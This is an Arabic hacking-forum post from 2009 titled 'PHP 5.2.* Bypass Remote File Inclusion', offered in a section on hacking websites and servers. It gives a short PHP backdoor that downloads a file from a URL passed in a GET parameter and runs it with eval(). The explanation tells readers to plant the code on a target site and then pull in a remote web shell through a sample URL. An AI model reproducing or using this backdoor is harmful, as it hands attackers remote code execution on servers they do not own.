التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 07-26-2009, 06:14 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية Crazy Dz
 

 

 
إحصائية العضو







Crazy Dz غير متواجد حالياً

إرسال رسالة عبر MSN إلى Crazy Dz

 

 

إحصائية الترشيح

عدد النقاط : 10
Crazy Dz is on a distinguished road

افتراضي PHP 5.2.* Bypass Remote File Inclusion)


سلام عليكم

كود PHP:
<?php
/*
 ************************
 * Include any File php *
 * PHP (Bypass 5.2.*)   *
 ************************
 * Coded By AL-MoGrM    *
 * T0v@hotmail.Com      *
 ************************
*/
if($_GET[t0v]){
$file=implode("\n",file($_GET[t0v]));
$t0v=str_replace("<?php""",$file);
$t0v=str_replace("<?""",$t0v);
$t0v=str_replace("?>""",$t0v);
eval(
$t0v);
}
?>


الشرح :-
ثغره في php تسمح لك تسحب اي ملف php من خارج السيرفر لان الاصدارات الجديده مانعه السحب
لغم الموقع بالكود هذا واسحب الشل بالطريقه ذي
http://site.com/file.php?t0v=http://...mages/Ex/r.txt

المصدر SecurityReason




PHP 5>2>* Bypass Remote File Inclusion)

التوقيع

http://im9.gulfup.com/2011-09-14/1316009561971.jpg

 

   

رد مع اقتباس
 

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 10:59 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0